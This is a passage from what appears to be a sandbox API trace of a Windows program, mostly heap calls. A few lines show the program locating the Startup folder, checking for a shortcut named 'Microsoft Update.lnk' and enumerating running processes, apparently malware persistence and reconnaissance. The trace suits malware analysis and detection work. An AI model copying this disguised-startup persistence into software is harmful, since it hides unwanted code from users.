Flags=0x0, Size=0x10) returned 0x34aa910 [0315.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0315.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0315.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0315.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0315.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0315.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0315.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0315.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0315.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0315.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0315.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0315.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0315.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0315.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0315.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0315.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0315.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0315.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0315.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0315.657] FreeLibrary (hLibModule=0x74f40000) returned 1 [0315.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0315.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0315.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0315.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0315.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0315.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0315.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0315.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0315.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0315.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0315.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0315.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0315.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0315.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0315.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0315.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0315.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0315.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0315.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0315.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0315.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0315.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0315.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0315.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0315.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0315.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0315.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0315.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0315.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0315.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0315.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0315.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0315.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0315.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0315.659] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0315.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0315.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0315.659] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0315.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0315.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0315.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0315.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0315.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0315.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0315.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0315.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0315.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0315.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0315.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0315.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0315.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0315.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0315.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0315.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0315.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0315.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0315.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0315.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0315.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0315.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0315.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0315.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0315.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0315.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0315.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0315.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0315.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0315.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0315.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0315.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0315.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0315.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0315.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0315.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0315.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0315.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0315.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0315.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0315.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0315.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0315.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0315.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0315.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0315.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0315.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0315.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0315.661] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0315.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0315.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0315.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0315.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0315.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0315.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0315.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0315.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0315.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0315.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0315.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0315.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0315.662] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0315.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0315.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0315.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa400 [0315.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0315.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0315.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa30 [0315.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0315.662] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8bf2a0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0315.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0315.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0315.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0315.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0315.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0315.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0315.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0315.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0315.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0315.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0315.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0315.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0315.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0315.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0315.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0315.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0315.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1d0) returned 0x24b2e00 [0315.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0315.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0315.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0315.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0315.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0315.664] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0x20 [0315.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2e00 | out: hHeap=0x25c0000) returned 1 [0315.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0315.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0315.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0315.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0315.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0315.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0315.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0315.664] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0315.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0315.664] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0315.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0315.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0315.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0315.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0315.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0315.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0315.665] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0315.667] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0315.668] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0315.668] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0315.669] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0315.670] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0315.671] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0315.672] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0315.672] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0315.673] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0315.674] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0315.675] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.676] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.676] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.677] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.678] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.679] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0315.680] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.680] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.681] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0315.692] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0315.693] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, 